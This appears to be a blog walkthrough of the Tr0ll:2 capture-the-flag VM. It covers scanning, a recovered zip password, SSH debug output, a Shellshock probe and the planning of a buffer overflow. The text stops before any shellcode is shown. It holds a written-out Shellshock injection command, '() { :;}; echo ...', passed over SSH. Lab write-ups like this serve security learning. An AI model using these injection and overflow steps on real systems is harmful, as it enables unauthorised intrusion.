Tuesday 12 July 2016

Tr0ll:2

Hello,
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)  Difficulty is beginner++ to intermediate.

Scanning
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
Let's begin from FTP service
Connected to 192.168.56.101.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.56.101:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
Uu, we cannot log in as anonymous user.
Let's browse the web application






















They bother me :-) I opened robots.txt file and there are several paths.






















Nice, isn't it? I add these paths to wordlist and run Dirbuster. We have got following result
Dir found: /noob/ - 200
Dir found: /keep_trying/ - 200
Dir found: /ok_this_is_it/ - 200
Dir found: /dont_bother/ - 200
OK, so only four paths are not a fake. So let's examine it. Hmm on each path I have got response






















OK, the picture must contain something hidden - I am pretty sure.
Picture from /dont_bother/ has injected commet
Look Deep within y0ur_self for the answer
Hmm, ok I browsed /y0ur_self/ directory











I have downloaded answer.txt file and there are a lot of base64 encoded line.
I conducted brute-force FTP credentials using decoded answer.txt file, without success. So, I was wondering how may look like credentials and I thought about root:root, so maybe Tr0ll:Tr0ll?

















Great! Let's download lmao.zip file and unpack it.







Ups, we need to have password... Maybe answer.txt would be useful in this case?
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL
Awesome! I have unpacked lmao.zip file using appropriate password




























We have got private key for SSH! Let's try login using the key.









I don't know what is going on. Let's use verbose modeOpenSSH_7.2p2 Debian-5, OpenSSL 1.0.2h  3 May 2016
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 192.168.56.101 [192.168.56.101] port 22.
debug1: Connection established.
debug1: permanently_set_uid: 0/0
debug1: key_load_public: No such file or directory
debug1: identity file noob type -1
debug1: key_load_public: No such file or directory
debug1: identity file noob-cert type -1
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_7.2p2 Debian-5
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4
debug1: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000000
debug1: Authenticating to 192.168.56.101:22 as 'noob'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: ecdh-sha2-nistp256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none
debug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none
debug1: sending SSH2_MSG_KEX_ECDH_INIT
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg
debug1: Host '192.168.56.101' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:4
debug1: rekey after 4294967296 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: rekey after 4294967296 blocks
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: noob
debug1: Authentication succeeded (publickey).
Authenticated to 192.168.56.101 ([192.168.56.101]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: Remote: Forced command.
debug1: Sending environment.
debug1: Sending env LANG = en_US.UTF-8
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
TRY HARDER LOL!
debug1: channel 0: free: client-session, nchannels 1
Connection to 192.168.56.101 closed.
Transferred: sent 2696, received 1712 bytes, in 0.0 seconds
Bytes per second: sent 54430.6, received 34564.2
debug1: Exit status 0
We have to google what is that. I found that this may be Shellshock vulnerability.
So, letry verfity our prediction
root@kali:~# ssh -l noob -i noob  192.168.56.101 '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
TRY HARDER LOL!
Yes, there is Shellshock, so we are able to exploit it.







Great! We have got limited shell. I went to the /home/noob/ directory and found


















So, we need to find bof file and use Buffer Overflow to get root and it would be over.

I found interesting file





let's try perform Buffer Overflow.







Now, we are sure that we have to prepare Buffer Overflow payload. To perform this kind of attack we have to know where is located EIP register.

















So, we know that our payload should be - [payload length 268] + [EIP] + [Trash]
I examined this application and I couldn't find JMP ESP but we can use CALL EAX.









Good, but unfortunately it is not work :( Maybe I am wrong, let's try again find jmp esp.






















Wow, there is a ESP register, so let's generate appropriate shellcode and execute it locally.